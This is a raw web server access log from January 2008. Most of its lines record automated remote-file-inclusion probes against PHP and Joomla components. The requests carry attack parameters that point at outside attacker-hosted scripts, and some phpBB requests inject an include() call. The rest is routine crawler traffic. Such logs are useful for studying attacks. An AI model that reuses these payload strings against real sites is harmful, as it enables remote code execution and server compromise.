74.200.201.194 - - [26/Jan/2008:05:54:03 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:05:54:12 -0800] "GET /logs/access_071231.log/akocomments.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:54:53 -0800] "GET /logs/access_071225.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:54:54 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.141.110 - - [26/Jan/2008:05:54:54 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:55:19 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:55:20 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.229.24.97 - - [26/Jan/2008:05:55:20 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.30.216.109 - - [26/Jan/2008:05:55:24 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
84.53.83.254 - - [26/Jan/2008:05:55:48 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:55:58 -0800] "GET /logs/access_071221.log/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:55:59 -0800] "GET /convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:55:59 -0800] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:05:56:04 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.40.66.137 - - [26/Jan/2008:05:56:11 -0800] "GET /logs/access_080106.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.40.66.137 - - [26/Jan/2008:05:56:11 -0800] "GET //?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.79" "www.dmulk.com"
65.40.66.137 - - [26/Jan/2008:05:56:12 -0800] "GET /logs//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 200 31831 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.216.11 - - [26/Jan/2008:05:56:13 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
65.40.66.137 - - [26/Jan/2008:05:56:15 -0800] "GET /logs/access_080101.log//?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.106.17 - - [26/Jan/2008:05:57:39 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.energycanarias.com/media/admin/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.213.194.42 - - [26/Jan/2008:05:58:05 -0800] "GET /logs/access_071224.log/convert/mvcw.php?step=1&vwar_root=http://www.drehuancavelica.gob.pe/templates/cmds.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.106.17 - - [26/Jan/2008:05:58:24 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.energycanarias.com/media/admin/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.106.17 - - [26/Jan/2008:05:58:24 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.energycanarias.com/media/admin/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.106.17 - - [26/Jan/2008:05:58:24 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.energycanarias.com/media/admin/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.130.218 - - [26/Jan/2008:05:58:27 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
67.19.130.218 - - [26/Jan/2008:05:58:27 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:05:59:02 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:05:59:03 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:05:59:03 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:05:59:04 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
130.117.98.158 - - [26/Jan/2008:05:59:10 -0800] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
130.117.98.158 - - [26/Jan/2008:05:59:10 -0800] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:59:48 -0800] "GET /logs/access_071225.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:59:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.114.129.109 - - [26/Jan/2008:05:59:49 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.194.210.190 - - [26/Jan/2008:06:00:04 -0800] "GET /logs/access_071214.log/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.194.210.190 - - [26/Jan/2008:06:00:04 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.194.210.190 - - [26/Jan/2008:06:00:04 -0800] "GET /logs/skin/zero_vote/ask_password.php?dir=http://jorgevolio.com/.cookies/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:06:00:21 -0800] "GET /logs/access_071225.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:06:00:21 -0800] "GET /administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.184.150 - - [26/Jan/2008:06:00:21 -0800] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.cultrans.com/images/f.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:00:49 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:00:50 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:00:50 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.19.212.254 - - [26/Jan/2008:06:01:07 -0800] "GET /logs//articles.php?do=viewart&id=%00&cat=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
216.19.212.254 - - [26/Jan/2008:06:01:07 -0800] "GET //articles.php?do=viewart&id=%00&cat=http://www.thebrn.kit.net/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:01:18 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:01:19 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:01:19 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:01:55 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.51.138.210 - - [26/Jan/2008:06:02:10 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:10 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:16 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:18 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:32 -0800] "GET /logs/access_080101.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:03:40 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.38.19.90 - - [26/Jan/2008:06:03:40 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.tus-dom-esch.de/templates/l?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:48 -0800] "GET /logs/access_080106.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:48 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:03:48 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:03:48 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:03:49 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:03:49 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.85.29.25 - - [26/Jan/2008:06:04:03 -0800] "GET /logs/access_080101.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.194.149.12 - - [26/Jan/2008:06:04:22 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://NewsCrew.altervista.org/hel/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.86 - - [26/Jan/2008:06:06:15 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://preferred-hosting.com/billing/whmauto_V2_hostgator/mib_data/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:06:06:26 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.114.132.12 - - [26/Jan/2008:06:06:29 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.kaozzoak.dk/images/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:06:06:29 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.90.211 - - [26/Jan/2008:06:06:29 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:06:06:55 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:06:06:55 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
194.60.207.191 - - [26/Jan/2008:06:06:56 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [26/Jan/2008:06:07:09 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:08:42 -0800] "GET /logs/access_080106.log//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [26/Jan/2008:06:08:43 -0800] "GET /logs//administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:09:31 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:09:31 -0800] "GET /components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:09:31 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:10:07 -0800] "GET /logs/access_071225.log//modules/TotalCalendar/about.php?inc_dir=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:10:08 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:10:08 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.200.201.194 - - [26/Jan/2008:06:10:56 -0800] "GET /logs/access_071230.log//modules/TotalCalendar/about.php?inc_dir=http://polepositionlingerie.com/images/r8? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.145 - - [26/Jan/2008:06:11:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:11:40 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
74.6.23.164 - - [26/Jan/2008:06:12:01 -0800] "GET /logs/access_071210.log HTTP/1.0" 200 177334 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.61.66.84 - - [26/Jan/2008:06:12:18 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.26.39 - - [26/Jan/2008:06:12:19 -0800] "GET /megumi/earrings/?S=D HTTP/1.0" 200 2065 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:12:22 -0800] "GET /plans/?D=A HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:12:22 -0800] "GET /mobileoffice/ HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:13:07 -0800] "GET /plans/?D=D HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.141 - - [26/Jan/2008:06:13:07 -0800] "GET /mobilehackers/ HTTP/1.0" 401 395 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:13:08 -0800] "GET /plans/?S=A HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:13:08 -0800] "GET /mobileoffice/?D=A HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:06:13:33 -0800] "GET /logs/access_071230.log/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
213.80.123.56 - - [26/Jan/2008:06:13:34 -0800] "GET /logs/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.212.224.181 - - [26/Jan/2008:06:13:39 -0800] "GET /plans/?S=D HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.164 - - [26/Jan/2008:06:13:54 -0800] "GET /mobileoffice/?D=D HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.168 - - [26/Jan/2008:06:13:54 -0800] "GET /mobileoffice/?S=A HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:13:55 -0800] "GET /plans/?N=A HTTP/1.0" 200 958 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.166 - - [26/Jan/2008:06:13:58 -0800] "GET /minamijewelry/ HTTP/1.0" 200 2100 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
67.19.18.66 - - [26/Jan/2008:06:14:38 -0800] "GET /logs/access_080106.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jwayauctions.com//logo/on.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.159 - - [26/Jan/2008:06:14:42 -0800] "GET /minamijewelry/source_images/ HTTP/1.0" 200 2398 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.148 - - [26/Jan/2008:06:14:42 -0800] "GET /mobileoffice/?M=A HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:14:43 -0800] "GET /logs/access_071225.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:14:43 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.25.169 - - [26/Jan/2008:06:14:43 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://theninjalegion.com/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.212.224.147 - - [26/Jan/2008:06:14:45 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.148 - - [26/Jan/2008:06:14:45 -0800] "GET /mobileoffice/?N=A HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:14:46 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.178 - - [26/Jan/2008:06:15:29 -0800] "GET /logs/ HTTP/1.0" 200 31810 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.143 - - [26/Jan/2008:06:15:29 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.166 - - [26/Jan/2008:06:15:30 -0800] "GET /mobileoffice/?M=D HTTP/1.0" 200 5008 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.166 - - [26/Jan/2008:06:15:33 -0800] "GET /logs/?D=A HTTP/1.0" 200 32467 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.163 - - [26/Jan/2008:06:16:15 -0800] "GET /imperant/ HTTP/1.0" 401 395 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
217.212.224.149 - - [26/Jan/2008:06:16:28 -0800] "GET /logs/?D=D HTTP/1.0" 200 31810 "-" "psbot/0.1 (+http://www.picsearch.com/bot.html)" "www.dmulk.com"
